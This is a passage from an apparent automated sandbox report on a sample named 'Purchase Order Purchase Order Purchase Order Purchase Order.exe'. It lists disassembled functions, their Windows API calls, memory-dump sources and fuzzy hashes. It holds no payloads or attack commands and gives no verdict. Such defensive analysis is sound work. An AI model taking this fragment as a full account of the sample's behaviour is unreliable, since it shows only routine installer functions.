                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: 6c83b12c4c61ce0a29b2e53fa2b62235010d080391b99c724a021bdb78d2c55c
                                              • Instruction ID: fb9840fdf261cdd2e47209f15e053d8a0f605d552cfd884262c755163c219c1a
                                              • Opcode Fuzzy Hash: 6c83b12c4c61ce0a29b2e53fa2b62235010d080391b99c724a021bdb78d2c55c
                                              • Instruction Fuzzy Hash: EE51E931F011D9AACB02DFA4FD405AEB6BAFB74317B234669E402A3744E7716E818791
                                              Function 70122398 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 701224DA
                                                • Part of subcall function 7012122C: lstrcpynW.KERNEL32(00000000,?,701212DF,00000019,701211BE,-000000A0), ref: 7012123C
                                              • GlobalAlloc.KERNEL32(?), ref: 70122460
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7012247B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: 9b1732b49b276af11a9cae37daaad73f132ecaef4cf3c949916b43c012d0fb9a
                                              • Instruction ID: 9e2041fd86f46edb10fe89be1af5b9370fbe4e55356319f2fdc3b8f4f32f9a16
                                              • Opcode Fuzzy Hash: 9b1732b49b276af11a9cae37daaad73f132ecaef4cf3c949916b43c012d0fb9a
                                              • Instruction Fuzzy Hash: 7D41CCB1304245FFC324EF20EC40A6E77B8FB68312B2149ADF546C6A55E774A985CB61
                                              Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                              • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                              • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                              • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                              Function 70121621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701221F0,?,00000808), ref: 70121639
                                              • GlobalAlloc.KERNEL32(?,00000000,?,00000000,701221F0,?,00000808), ref: 70121640
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701221F0,?,00000808), ref: 70121654
                                              • GetProcAddress.KERNEL32(701221F0,00000000), ref: 7012165B
                                              • GlobalFree.KERNEL32(00000000), ref: 70121664
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 306b7e899ab3b51c4dee159bcb5adcfe4c5b410532022079d8756333e72687c4
                                              • Instruction ID: eebe76f53b73d4ef25ce4290d27e5115cd55e26eeddc99e8e97295f0e51062ab
                                              • Opcode Fuzzy Hash: 306b7e899ab3b51c4dee159bcb5adcfe4c5b410532022079d8756333e72687c4
                                              • Instruction Fuzzy Hash: 03F01C733061387BD62017A78C4CD9BBE9CDF8B2F5B210211F628921A186618C02DBF5
                                              Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                              • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                              • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                              • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                              • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                              • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                              • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                              Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                              • wsprintfW.USER32 ref: 00404B88
                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                              • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                              • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                              • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                              Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405B95
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405B9F
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405BB1
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-4083868402
                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                              Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                              • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                              • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                              • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                              Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,?,0000000A), ref: 00402E8C
                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                              • ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402ED5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                              • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                              • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                              • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                              Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038ED,00403703,00000006,?,00000006,?,0000000A), ref: 0040392F
                                              • GlobalFree.KERNEL32(?), ref: 00403936
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-4083868402
                                              • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                              • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                              • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                              • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                              Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BE1
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BF1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-1876063424
                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                              Function 701210E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(?,?), ref: 7012116A
                                              • GlobalFree.KERNEL32(00000000), ref: 701211C7
                                              • GlobalFree.KERNEL32(00000000), ref: 701211D9
                                              • GlobalFree.KERNEL32(?), ref: 70121203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 1540ddf22e97d2b2415a9f4e55ef73754e52c426f3b39eba46273dc433e436ce
                                              • Instruction ID: 44d8144fc5f75ef9f2061966979789ff4f6cfc2d89a5f21fb3a959a4db4468c9
                                              • Opcode Fuzzy Hash: 1540ddf22e97d2b2415a9f4e55ef73754e52c426f3b39eba46273dc433e436ce
                                              • Instruction Fuzzy Hash: 6531A1B2B00201EFD300CF75FD45A6E77F8EB652127220529FA42D3B25E774E9528B25
                                              Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                              • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
